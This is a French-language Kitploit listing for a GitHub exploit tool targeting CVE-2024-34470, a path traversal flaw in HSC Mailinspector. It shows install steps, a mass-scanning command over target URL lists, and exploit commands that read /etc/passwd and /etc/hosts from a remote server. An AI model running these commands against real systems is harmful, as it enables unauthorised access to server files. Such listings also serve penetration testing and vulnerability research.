Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-34470 — Une vulnérabilité critique a été découverte dans HSC Mailinspector jusqu'à la version 5.2.18. Cette vulnérabilité affecte une fonctionnalité inconnue du fichier /public/loader.php. | Kitploit
Outils/GitHubGitHub/mr-r00t11/cve-2024-34470
ReconnaissanceAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHubmr-r00t11/cve-2024-34470

CVE-2024-34470

Une vulnérabilité critique a été découverte dans HSC Mailinspector jusqu'à la version 5.2.18. Cette vulnérabilité affecte une fonctionnalité inconnue du fichier /public/loader.php.

Voir le dépôt
51il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

HSC MailInspector - CVE-2024-34470


Une vulnérabilité critique a été découverte dans HSC Mailinspector jusqu'à la version 5.2.18. Cette vulnérabilité affecte une fonctionnalité inconnue du fichier /public/loader.php. La manipulation de l'argument 'path' avec une entrée inconnue conduit à une vulnérabilité de traversée de chemin. Selon CWE, ce problème est classé comme CWE-22. Le produit utilise une entrée externe pour construire un chemin d'accès destiné à identifier un fichier ou un répertoire situé sous un répertoire parent restreint, mais le produit ne neutralise pas correctement les éléments spéciaux dans le chemin qui peuvent amener le chemin à résoudre en un emplacement en dehors du répertoire restreint. Cela affecte la confidentialité, l'intégrité et la disponibilité.


Installation

Clone the repository:

root@kitploit:~
git clone https://CVE-2024-34470.git
cd CVE-2024-34470

Installer les dépendances

Assurez-vous que Python et pip sont installés. Ensuite, exécutez :

root@kitploit:~
pip install -r requirements.txt
  • Cela installera toutes les dépendances nécessaires pour exécuter le script.

Utilisation

Description du script

Pour effectuer une recherche sur plusieurs cibles à l'aide d'un fichier texte, utilisez le script Massive_CVE-2024-34470.py

root@kitploit:~
$ python3 Massive_CVE-2024-34470.py urls.txt urls_vulnerable.txt 2>/dev/null

Le format dans lequel le fichier urls.txt doit être est le suivant :

root@kitploit:~
https://10.18.97.2
http://domain.com
https://192.8.7.2:4443

[Screenshot_1.png]


Une fois les cibles vulnérables identifiées, nous utilisons le script appelé CVE-2024-34470.py pour exploiter et afficher le contenu spécifié via le terminal.

root@kitploit:~
# Read file content passwd
$ python CVE-2024-34470.py http://example.com /etc/passwd 2>/dev/null

# Read file content hosts
$ python CVE-2024-34470.py http://example.com /etc/hosts

[screenshot_2.png]

Télécharger l’outil